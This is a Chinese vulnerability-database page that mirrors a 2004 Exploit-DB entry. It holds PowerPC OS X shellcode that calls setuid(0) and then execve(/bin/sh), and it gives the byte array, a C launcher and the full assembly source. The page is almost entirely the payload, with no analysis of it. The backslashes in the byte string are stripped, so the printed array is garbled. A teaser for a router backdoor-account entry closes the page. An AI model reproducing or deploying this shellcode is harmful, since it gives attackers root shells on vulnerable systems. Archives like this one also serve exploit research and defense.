OSX/PPC – setuid(0) + execve(/bin/sh) Shellcode (88 bytes)-安全小百科

OSX/PPC – setuid(0) + execve(/bin/sh) Shellcode (88 bytes)

漏洞ID	1054644	漏洞类型
发布时间	2004-09-26	更新时间	2004-09-26
CVE编号	N/A	CNNVD-ID	N/A
漏洞平台	OSX_PPC	CVSS评分	N/A

|漏洞来源

https://www.exploit-db.com/exploits/13484

|漏洞详情

漏洞细节尚未披露

|漏洞EXP

/*
PPC OSX/Darwin Shellcode by B-r00t. 2003.
Does setuid(0); execve(/bin/sh); exit(0);
See ASM below.
88 Bytes.
*/
char shellcode[] =
"x7cx63x1ax79x40x82xffxfd"
"x7dx68x02xa6x3bxebx01x70"
"x39x40x01x70x39x1fxfexdf"
"x7cx68x19xaex38x0axfexa7"
"x44xffxffx02x60x60x60x60"
"x7cxa5x2ax79x38x7fxfexd8"
"x90x61xffxf8x90xa1xffxfc"
"x38x81xffxf8x38x0axfexcb"
"x44xffxffx02x7cxa3x2bx78"
"x38x0axfex91x44xffxffx02"
"x2fx62x69x6ex2fx73x68x58";

int main (void)
{
        __asm__("b _shellcode");
}


/*
; PPC OS X / Darwin Shellcode by B-r00t.
; setuid(0) execve(/bin/sh) exit(0)
;
.globl _main
.text
_main:
        xor.    r3, r3, r3
        bnel    _main
        mflr    r11
        addi    r31, r11, 368
        li      r10, 368
        addi    r8, r31, -289
        stbx    r3, r8, r3
        addi    r0, r10, -345
        .long   0x44ffff02
        .long   0x60606060
        xor.    r5, r5, r5
        addi    r3, r31, -296
        stw     r3, -8(r1)
        stw     r5, -4(r1)
        subi    r4, r1, 8
        addi    r0, r10, -309
        .long   0x44ffff02
        mr      r3, r5
        addi    r0, r10, -367
        .long   0x44ffff02
path:   .asciz  "/bin/shX"

*/

// milw0rm.com [2004-09-26]

相关推荐: Dynalink RTA 230 ADSL Router Default Backdoor Account Vulnerability

Dynalink RTA 230 ADSL Router Default Backdoor Account Vulnerability 漏洞ID 1097968 漏洞类型 Design Error 发布时间 2004-09-03 更新时间 2004-09-03…

文章版权归作者所有，未经允许请勿转载。

THE END